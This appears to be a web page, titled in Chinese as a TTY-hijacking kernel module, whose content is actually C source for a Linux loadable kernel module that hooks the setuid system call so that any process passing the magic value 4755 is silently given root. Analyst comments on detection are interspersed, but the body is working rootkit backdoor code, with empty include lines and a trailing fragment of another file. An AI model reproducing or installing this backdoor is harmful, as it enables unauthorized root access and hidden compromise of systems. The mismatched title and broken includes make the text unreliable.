利用linux内核模块实现TTY hijacking dfg
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#ifdef NEED_VERSION
/* Kernel release string, compiled in only when NEED_VERSION is defined. */
static char kernel_version[] = UTS_RELEASE;
#endif
static inline _syscall1(int, setuid, uid_t, uid);/* Use the _syscall1 macro to
generate a local setuid() stub that takes a single uid_t argument. */
extern void *sys_call_table[];/* The kernel's system call table, declared extern
so the code below can read and overwrite its entries.
NOTE(review): this only links if the running kernel exports sys_call_table as a
symbol; confirm for the kernel under analysis. */
/*
 * hacked_setuid - replacement handler installed in sys_call_table[SYS_setuid].
 *
 * When called with uid == 4755 it zeroes the calling task's uid, euid, gid and
 * egid and reports success; no permission check of any kind is made first, so
 * any local process that knows the magic value gains root identity. For every
 * other uid it forwards to the saved original handler.
 *
 * Returns 0 for the magic value; otherwise the forwarded call's result, or
 * -errno when the setuid() stub returned -1.
 *
 * Review notes for analysts:
 *  - The hook is visible as a mismatch between sys_call_table[SYS_setuid] and
 *    the kernel's own setuid handler address.
 *  - No locking is visible around the table swap below, so the table is
 *    briefly un-hooked while a forwarded call is in flight.
 */
void *original_setuid; /* saved pointer to the original setuid handler */ extern int hacked_setuid(uid_t uid)/* the handler that replaces setuid */
{
/* result of the forwarded setuid() call */
int i;
/* Magic value: grant root instead of performing a real setuid. */
if(uid == 4755)
{
current->uid = current->euid = current->gid = current->egid = 0;
/* Set the current process's uid, euid, gid and egid to zero. */
return 0;
}
sys_call_table[SYS_setuid] = original_setuid;/* put the original handler back (the source comment said "save", but this line restores); presumably so the stub below reaches the real setuid */
i = setuid(uid);
sys_call_table[SYS_setuid] = hacked_setuid;/* re-install the hook */
/* The stub reports failure as -1 with errno set; convert to a negative errno return. */
if(i == -1) return -errno;
else return i;
}
/*
 * init_module - module load entry point.
 *
 * Saves the current sys_call_table[SYS_setuid] entry in original_setuid, then
 * overwrites that entry with hacked_setuid. The save must come first, because
 * original_setuid is what the forwarding path and cleanup_module restore from.
 * Always returns 0.
 */
int init_module(void) /* load */ {
original_setuid = sys_call_table[SYS_setuid];
sys_call_table[SYS_setuid] = hacked_setuid;
return 0;
}
/*
 * cleanup_module - module unload entry point.
 *
 * Writes the saved original_setuid pointer back into sys_call_table[SYS_setuid],
 * removing the hook installed by init_module.
 */
void cleanup_module(void) /* unload */
{
sys_call_table[SYS_setuid] = original_setuid; }
<++> linspy/linspy.c
int errno;
#include
#include